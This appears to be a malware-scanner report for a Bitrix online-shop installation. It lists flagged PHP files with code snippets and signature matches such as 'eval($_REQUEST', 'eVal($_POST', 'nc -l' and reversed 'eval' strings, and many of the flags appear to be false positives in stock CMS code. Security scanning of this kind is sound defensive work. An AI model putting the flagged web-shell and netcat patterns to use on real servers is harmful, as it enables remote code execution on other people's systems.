exec(): void $defaultColors self::getColorCodes(); $request Application::getInstance()->getContext()->getRequest(); if ($request->get('color')) { $colorHex $request->get('color'); } elseif ( ($themeCodeFromRequest $request->get('theme')) && array_key_exists($themeCodeFromRequest$defaultColors) ) { $themeCode $themeCodeFromRequest$colorHex $defaultColors[$themeCodeFromRequest]['color']; } else { $colorHex HtmlFilter::encode(trim($this->fields['COLOR']->getValue())); if (!$colo...

/home/web/web/vsavto.com/public_html/bitrix/modules/aspro.next/classes/general/lessc.inc.php

Size: 96.44 kB Created: 2023-02-02 19:19:37 Modified: 2025-02-03 05:36:42 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 2182 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

Function strrev exec_strrev Line: 2111 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cexe

/home/web/web/vsavto.com/public_html/bitrix/modules/aspro.next/install/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main3/component_epilog.php

Size: 69.38 kB Created: 2023-02-02 19:27:39 Modified: 2025-02-03 05:36:42 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 500 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/modules/aspro.next/install/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main5/component_epilog.php

Size: 69.36 kB Created: 2023-02-02 19:27:39 Modified: 2025-02-03 05:36:42 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 495 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/modules/aspro.next/install/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main/component_epilog.php

Size: 73.82 kB Created: 2023-02-02 19:28:00 Modified: 2025-02-03 05:36:42 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 915 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                        "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                        "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                        "
BASKET_URL" => $arParams["BASKET_URL"],
                        "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                        "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                        "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                        "
USE_PRODUCT_QUANTITY" => 'N',
                        "
OFFER_TREE_PROPS_{$templateData[...

/home/web/web/vsavto.com/public_html/bitrix/modules/aspro.next/install/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main2/component_epilog.php

Size: 66.01 kB Created: 2023-02-02 19:27:39 Modified: 2025-02-03 05:36:42 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 503 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                                "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                                "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                                "
BASKET_URL" => $arParams["BASKET_URL"],
                                "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                                "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                                "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                                "
USE_PRODUCT_QUANTITY" => 'N',
                                "
OFFER_TREE_PROPS...

/home/web/web/vsavto.com/public_html/bitrix/modules/aspro.next/install/wizards/aspro/next/site/templates/aspro_next/components/bitrix/catalog.element/main4/component_epilog.php

Size: 78.58 kB Created: 2023-02-02 19:28:00 Modified: 2025-02-03 05:36:42 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 944 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                        "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                        "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                        "
BASKET_URL" => $arParams["BASKET_URL"],
                        "
ADD_PROPERTIES_TO_BASKET" => $arParams["ADD_PROPERTIES_TO_BASKET"],
                        "
PRODUCT_PROPS_VARIABLE" => $arParams["PRODUCT_PROPS_VARIABLE"],
                        "
PARTIAL_PRODUCT_PROPERTIES" => $arParams["PARTIAL_PRODUCT_PROPERTIES"],
                        "
USE_PRODUCT_QUANTITY" => 'N',
                        "
OFFER_TREE_PROPS_{$templateData[...

/home/web/web/vsavto.com/public_html/bitrix/modules/aspro.next/install/wizards/aspro/next/site/templates/aspro_next/components/bitrix/sale.gift.main.products/main/template.php

Size: 6.68 kB Created: 2023-02-02 19:25:12 Modified: 2025-02-03 05:36:42 Dangers: 2
DescriptionMatch

Exploit clever_include Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"], "CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"], "CURRENCY_ID" => $arParams["CURRENCY_ID"], "HIDE_NOT_AVAILABLE" => $arParams["HIDE_NOT_AVAILABLE"], "TEMPLATE_THEME" => (isset($arParams["TEMPLATE_THEME"]) ? $arParams["TEMPLATE_THEME"] : ""), "ADD_PICT_PROP" => (isset($arParams["ADD_PICT_PROP"]) ? $arParams["ADD_PICT_PROP"] : ""), "LABEL_PROP" => (isset($arParams["LABEL_PROP"]) ? $arParams["LABEL_PROP"] : ""), "OFFER_ADD_PICT_PROP" => (isset($arPara...

Exploit clever_include Line: 79 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE" => $arParams["PRICE_VAT_INCLUDE"],
                    "
CONVERT_CURRENCY" => $arParams["CONVERT_CURRENCY"],
                    "
CURRENCY_ID" => $arParams["CURRENCY_ID"],
                    "
HIDE_NOT_AVAILABLE" => $arParams["HIDE_NOT_AVAILABLE"],
                    "
TEMPLATE_THEME" => (isset($arParams["TEMPLATE_THEME"]) ? $arParams["TEMPLATE_THEME"] : ""),

                    "
ADD_PICT_PROP" => (isset($arParams["ADD_PICT_PROP"]) ? $arParams["ADD_PICT_PROP"] : ""),

                    "
LABEL_PROP" => (isset($arParams["LABEL_PROP"]) ? $arParams["LABEL_PROP"] : ""),
                    "
O...

/home/web/web/vsavto.com/public_html/bitrix/modules/support/admin/ru/ticket_message_js.php

Size: 6.66 kB Created: 2022-12-02 17:30:40 Modified: 2025-02-03 05:36:43 Warns: 1
DescriptionMatch

Function eval Line: 29 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(thetag "_open");
    if (
tagOpen == 0)
    {
        if (
DoInsert(objTextarea"<"+thetag+">""</"+thetag+">"))
        {
            eval(
thetag "_open = 1");
            eval(
"document.form1." thetag ".value += '*'");
        }
    }
    else
    {
        
DoInsert(objTextarea"</"+thetag+">""");
        eval(
"document.form1." thetag ".value = ' " + eval(thetag "_title") + " '");
        eval(
thetag "_open = 0");
    }
    
BX.fireEvent(objTextarea'change');
}

function 
mozillaWr(textareaopenclose)
{
    var 
selLength textarea.textLength;...

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/classes/general/subelement.php

Size: 56.17 kB Created: 2022-12-02 17:30:41 Modified: 2025-02-03 05:36:43 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(\''.CUtil::JSEscape($this->onLoadScript).'\');'; echo '</script></body></html>'; } else { if($this->onLoadScript) echo '<script type="text/javascript">'.$this->onLoadScript.'</script>'; echo $string; } define("ADMIN_AJAX_MODE"true); require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_after.php"); die(); } elseif ($this->isExportMode()) { $fname basename($APPLICATION->GetCurPage(), ".php"); $fname str_replace(array("\r""\n"), ""$fname); header("Content-Typ...

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/install/components/bitrix/catalog.element/templates/.default/template.php

Size: 64.58 kB Created: 2022-12-02 17:30:41 Modified: 2025-02-03 05:36:43 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 1132 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                                '
CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                                '
BASKET_URL' => $arParams['BASKET_URL'],
                                '
ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                                '
PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                                '
PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                                '
USE_PRODUCT_QUANTITY' => 'N',
                                '
PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/install/components/bitrix/catalog.element/templates/bootstrap_v4/template.php

Size: 64.75 kB Created: 2022-12-02 17:30:41 Modified: 2025-02-03 05:36:43 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 1167 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                        '
CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                        '
BASKET_URL' => $arParams['BASKET_URL'],
                        '
ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                        '
PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                        '
PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                        '
USE_PRODUCT_QUANTITY' => 'N',
                        '
PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'],
                        '
CACH...

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/install/components/bitrix/catalog.element/templates/store_v3/template.php

Size: 67.30 kB Created: 2022-12-02 17:30:41 Modified: 2025-02-03 05:36:43 Dangers: 1
DescriptionMatch

Exploit clever_include Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'], 'CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'], 'BASKET_URL' => $arParams['BASKET_URL'], 'ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'], 'PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'], 'PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'], 'USE_PRODUCT_QUANTITY' => 'N', 'PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'], 'CACHE_GROUPS' => $arParams['CACHE_GROUPS'], 'POTENTI...

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/install/components/bitrix/catalog.sections.top/component.php

Size: 17.92 kB Created: 2022-12-02 17:30:41 Modified: 2025-02-03 05:36:43 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 180 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php

Size: 14.80 kB Created: 2022-12-02 17:30:43 Modified: 2025-02-03 05:36:43 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }
                    
                    
BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    
if(window.commentEr && window.commentEr == "Y")
                    {
                        
BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(
BX('edit_id').value 0)
                        {
                            var 
commentId 'blg-comment-'+this.id[1];
                            if(
BX(commentId))
                            {
                                var 
newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/lib/model/section.php

Size: 2.01 kB Created: 2022-12-02 17:30:46 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($entity); self::$entityInstance[$iblockId] = $entityName; } return self::$entityInstance[$iblockId]; } protected static function resolveIblockId($iblock): ?int $iblockId null; if ($iblock instanceof Iblock) { $iblockId $iblock->getId(); } elseif (is_string($iblock)) { $row IblockTable::query() ->addSelect('ID') ->where('API_CODE'$iblock) ->fetch(); if (!empty($row)) { $iblockId = (int)$row['ID']; } } if (empty($iblockId) && is_numeric($iblock)) { $iblockId = (int)

/home/web/web/vsavto.com/public_html/bitrix/modules/iblock/admin/iblock_subelement_generator.php

Size: 28.34 kB Created: 2022-12-02 17:30:46 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(arFileProperties),
            
id 0;
        if(
BX('ib_seg_max_property_id'))
        {
            
id BX('ib_seg_max_property_id').value;
            if(
id >= obPropertyTable.AR_FILE_PROPERTIES.length 2)
            {
                return;
            }
            
BX('ib_seg_max_property_id').value Number(BX('ib_seg_max_property_id').value) + 1;
        }
        
obPropertyTable.SELECTED_PROPERTIES[id] = 'DETAIL';

        var 
propertySpan BX('ib_seg_property_span');
        if(
propertySpan)
        {
            var 
options = [];
            for(var 
key in fileProperties)
            {
                if(
fileProperties....

/home/web/web/vsavto.com/public_html/bitrix/modules/webprostor.core/classes/general/functions.php

Size: 23.36 kB Created: 2022-12-02 17:30:46 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Exploit concat_vars_with_spaces Line: 32 Warning

Concatenation of vars technique is usually used for the obfuscation of malicious code

$subA.$subG.$subD.$subB.$subH.$subF.$subC.$subI.

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/general/discount.php

Size: 54.51 kB Created: 2022-12-02 17:30:46 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('$checkOrder='.$strUnpack.';'); if (!is_callable($checkOrder)) return false$boolRes $checkOrder($arOrder); unset($checkOrder); return $boolRes; } protected static function __ApplyActions(&$arOrder$strActions) { $applyOrder null; if (!empty($strActions)) { eval('$applyOrder='.$strActions.';'); if (is_callable($applyOrder)) $applyOrder($arOrder); } } protected static function __ConvertOldFormat($strAction, &$arFields) { global $APPLICATION$arMsg = array(); $boolResult true$arNee...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/general/sale_report_helper.php

Size: 110.21 kB Created: 2022-12-02 17:30:47 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( 'function ___dbCastIntToChar($dbtype, $param)''{''   $result = $param;''   if (ToLower($dbtype) === "mssql")''   {''       $result = "CAST(".$param." AS VARCHAR)";''   }''   return $result;''}' ); } if (self::$bUsePriceTypesColumns) { foreach (self::$priceTypes as $id => $info) { if ($info['selected'] === true) { $fieldName 'PRICE_TYPE_'.$id$runtime[$fieldName] = array( 'data_type' => 'string''expression' => array('
                (SELECT '
.$DB->Concat(___dbCastIntToChar('mysql'...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/install/components/bitrix/sale.location.import/templates/.default/template.php

Size: 15.64 kB Created: 2022-12-02 17:30:49 Modified: 2025-02-03 05:36:44 Dangers: 1
DescriptionMatch

Sign 7830f7a6 Line: 11 Dangerous

Malware Signature (hash: 7830f7a6)

nc-l

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/install/components/bitrix/sale.location.import/templates/admin/template.php

Size: 13.68 kB Created: 2022-12-02 17:30:49 Modified: 2025-02-03 05:36:44 Dangers: 1
DescriptionMatch

Sign 7830f7a6 Line: 17 Dangerous

Malware Signature (hash: 7830f7a6)

nc-l

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/install/components/bitrix/sale.ajax.delivery.calculator/templates/.default/ajax.php

Size: 0.99 kB Created: 2022-12-02 17:30:50 Modified: 2025-02-03 05:36:44 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 15 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/install/components/bitrix/sale.ajax.delivery.calculator/templates/input/ajax.php

Size: 864.00 B Created: 2022-12-02 17:30:50 Modified: 2025-02-03 05:36:44 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 15 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/install/components/bitrix/sale.location.selector.system/templates/.default/template.php

Size: 17.99 kB Created: 2022-12-02 17:30:52 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system(<?=CUtil::PhpToJSObject(array( 'scope' => 'slss-'.intval($arResult['RANDOM_TAG']), 'source' => $component->getPath().'/get.php''query' => array( 'BEHAVIOUR' => array( 'LANGUAGE_ID' => LANGUAGE_ID ), ), 'editUrl' => '?'.implode('&'$urlComponents), 'parentTagId' => intval($arResult['RANDOM_TAG']), 'useCodes' => $arResult['USE_CODES'], 'types' => $arResult['TYPES'], 'startSearchLen' => $component::START_SEARCH_LEN'pageSize' => $component::PAGE_SIZE'hugeTailLen' => $component::HUGE_TA...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/install/components/bitrix/sale.basket.order.ajax/component.php

Size: 38.65 kB Created: 2022-12-02 17:30:52 Modified: 2025-02-03 05:36:44 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 556 Dangerous

Malware Signature (hash: 11413268)

eVal($_POST

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/install/components/bitrix/sale.notice.product/templates/.default/template.php

Size: 7.43 kB Created: 2022-12-02 17:30:53 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Line: 130 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+res+')' );

                            if (
rs['ERRORS'].length 0)
                            {
                                if (
rs['ERRORS'] == 'NOTIFY_ERR_NULL')
                                    
BX('popup_n_error').innerHTML '<?=GetMessageJS('NOTIFY_ERR_NULL')?>';
                                else if (
rs['ERRORS'] == 'NOTIFY_ERR_CAPTHA')
                                    
BX('popup_n_error').innerHTML '<?=GetMessageJS('NOTIFY_ERR_CAPTHA')?>';
                                else if (
rs['ERRORS'] == 'NOTIFY_ERR_MAIL_EXIST')
                                {
                                    
BX('popup_n_error').innerHTML '<?=GetMessageJS('NOTIFY_ERR_MAIL_BUYERS_EXIST')?>';
                        ...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/lib/discountbase.php

Size: 155.77 kB Created: 2022-12-02 17:30:54 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($evalCode); } catch (\ParseError $e) { $this->showAdminError(); } } else { eval($evalCode); } unset($evalCode); if (!is_callable($checkOrder)) return false$result $checkOrder($this->orderData); unset($checkOrder); } else { if (!is_callable($discountLink[$executeKey])) return false$result $discountLink[$executeKey]($this->orderData); } unset($discountLink); return $result; } protected function applySaleDiscount() { $result = new ResultDiscount\Actions::clearApplyCounter(); $discoun...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/lib/compatible/discountcompatibility.php

Size: 44.44 kB Created: 2022-12-02 17:30:54 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('$applyProduct='.$orderApplication.';'); if (is_callable($applyProduct)) $applyProduct($fields); unset($applyProduct); if (!empty($fields['DISCOUNT_RESULT'])) { self::$discountResult['BASKET'][$code][$index]['RESULT']['DESCR_DATA'] = $fields['DISCOUNT_RESULT']['BASKET']; self::$discountResult['BASKET'][$code][$index]['RESULT']['DESCR'] = self::formatDescription($fields['DISCOUNT_RESULT']); } unset($fields['DISCOUNT_RESULT']); } unset($orderApplication); } unset($discount$index); return tr...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/lib/location/import/compiler/compiler.php

Size: 75.72 kB Created: 2022-12-02 17:30:54 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system('cp '.$workDir.self::STATIC_CSV_DIR.'externalservice.csv '.$workDir.'/'.self::OUTPUT_DIR); system('cp '.$workDir.self::STATIC_CSV_DIR.'type.csv '.$workDir.'/'.self::OUTPUT_DIR); } private $currentParentGroup ''; private function addItemToCSV($fName$group$item) { $data = array( 'CODE' => $item['CODE'], 'PARENT_CODE' => $item['PARENT_CODE'], 'TYPE_CODE' => $item['TYPE_CODE'] ); $data['NAME.RU.NAME'] = ''$data['NAME.EN.NAME'] = ''$data['NAME.UA.NAME'] = ''$name unserialize($ite...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/lib/discount/preset/basepreset.php

Size: 23.95 kB Created: 2022-12-02 17:30:54 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $isPost $this->request->isPost(); $stepName $this->getStepName(); $state $this->getState(); if($stepName === $this->getFirstStepName() && !$isPost && $this->isDiscountEditing()) { $state $this->generateState($this->discount); } if($this->isRunningPrevStep()) { $stepName $state->getPrevStep(); } if($isPost && !$this->isRunningPrevStep()) { list($state$nextStep) = $this->runStep($stepName$stateself::MODE_SAVE); if($stepName != $nextStep) { $state->addStepChain($stepName); ...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/lib/internals/product.php

Size: 8.76 kB Created: 2022-12-02 17:30:55 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( 'function ___dbCastIntToChar($dbtype, $param)''{''   $result = $param;''   if (ToLower($dbtype) === "mssql")''   {''       $result = "CAST(".$param." AS VARCHAR)";''   }''   return $result;''}' ); } $fieldsMap = array( 'ID' => array( 'data_type' => 'integer''primary' => true ), 'TIMESTAMP_X' => array( 'data_type' => 'integer' ), 'DATE_UPDATED' => array( 'data_type' => 'datetime''expression' => array( $DB->datetimeToDateFunction('%s'), 'TIMESTAMP_X', ) ), 'QUANTITY' => a...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/lib/internals/conversionhandlers.php

Size: 13.14 kB Created: 2022-12-02 17:30:55 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 283 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*array*/

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/handlers/paysystem/yandexinvoice/lang/en/.description.php

Size: 952.00 B Created: 2022-12-02 17:30:59 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function system Line: 3 Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (ShopID)

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/handlers/paysystem/yandex/lang/en/.description.php

Size: 2.62 kB Created: 2022-12-02 17:30:59 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (scid)"; $MESS["SALE_HPS_YANDEX_SCID_DESC"] = "Showcase identifier in payment collector system (scid)

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/report_construct.php

Size: 22.89 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('('+res+')');
                                        
filters BX.findChildren(filterContainer, {class: 'sale-report-site-dependent'}, true);
                                        for(
i in filters)
                                        {
                                            if (
filters[i].tagName == 'SELECT')
                                            {
                                                
filterType filters[i].getAttribute('tid');
                                                if (
filterType)
                                                {
                                                    
fRewriteSelectFromArray(filters[i], res[filterType], '');
                                                }
                                                
filters[i].value '';
                                            }
                                        }
                                    }
                                }
                                function ...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/yandexinvoice_settings.php

Size: 9.31 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 2
DescriptionMatch

Function proc_close Warning

Potentially dangerous function `proc_close`

[https://www.php.net/proc_close]

proc_close($process); $dbRes = \Bitrix\Sale\Internals\YandexSettingsTable::getById($shopId); if ($dbRes->fetch()) \Bitrix\Sale\Internals\YandexSettingsTable::update($shopId, array('PKEY' => $privateKey)); else \Bitrix\Sale\Internals\YandexSettingsTable::add(array('SHOP_ID' => $shopId'PKEY' => $privateKey)); } else { $errorMsg Loc::getMessage('SALE_YANDEX_INVOICE_SETTINGS_ALREADY_CONFIGURED'); } if ($errorMsg === '') { $redirectUrl $APPLICATION->GetCurPage()."?pay_system_id=".$id."&lang=".L...

Function proc_open Warning

Potentially dangerous function `proc_open`

[https://www.php.net/proc_open]

proc_open($command$descriptorSpec$pipes); $privateKey stream_get_contents($pipes[1]); $return_value proc_close($process); $dbRes = \Bitrix\Sale\Internals\YandexSettingsTable::getById($shopId); if ($dbRes->fetch()) \Bitrix\Sale\Internals\YandexSettingsTable::update($shopId, array('PKEY' => $privateKey)); else \Bitrix\Sale\Internals\YandexSettingsTable::add(array('SHOP_ID' => $shopId'PKEY' => $privateKey)); } else { $errorMsg Loc::getMessage('SALE_YANDEX_INVOICE_SETTINGS_ALREADY_CONFIG...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/order_new.php

Size: 274.77 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval( '('+res+')' );

            if (
rss["status"] == "ok")
            {
                
BX('CART_FIX').value'N';

                var 
userEl BX("user_id");
                var 
orderID '<?=$ID?>';

                
locationID rss["location_id"];
                
locationZipID rss["location_zip_id"];

                
insertHtmlResult(document.getElementById("buyer_type_change"), rss['buyertype']);
                
insertHtmlResult(document.getElementById("buyer_type_delivery"), rss['buyerdelivery']);

                <?if(
CSaleLocation::isLocationProEnabled()):?>
                    initZipHandling();
                <?endif?...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/buyers.php

Size: 16.50 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 537 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*BUYER*/

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/delivery.php

Size: 11.61 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("document.find_form.filter_lang");
                
filter_order_price_from = eval("document.find_form.filter_order_price_from");
                
filter_order_price_to = eval("document.find_form.filter_order_price_to");
                
f_currency = eval("document.find_form.f_currency");

                var 
iesum;
                if (
parseInt(filter_lang.selectedIndex)==0)
                {
                    
filter_order_price_from.disabled true;
                    
filter_order_price_to.disabled true;
                    
f_currency.value "";
                }
                else
                {
                    
filter_order_price_from.disa...

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/discount_preset_list.php

Size: 14.14 kB Created: 2022-12-02 17:31:01 Modified: 2025-02-03 05:36:44 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 56 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*close*/

/home/web/web/vsavto.com/public_html/bitrix/modules/sale/admin/1c_admin_profile.php

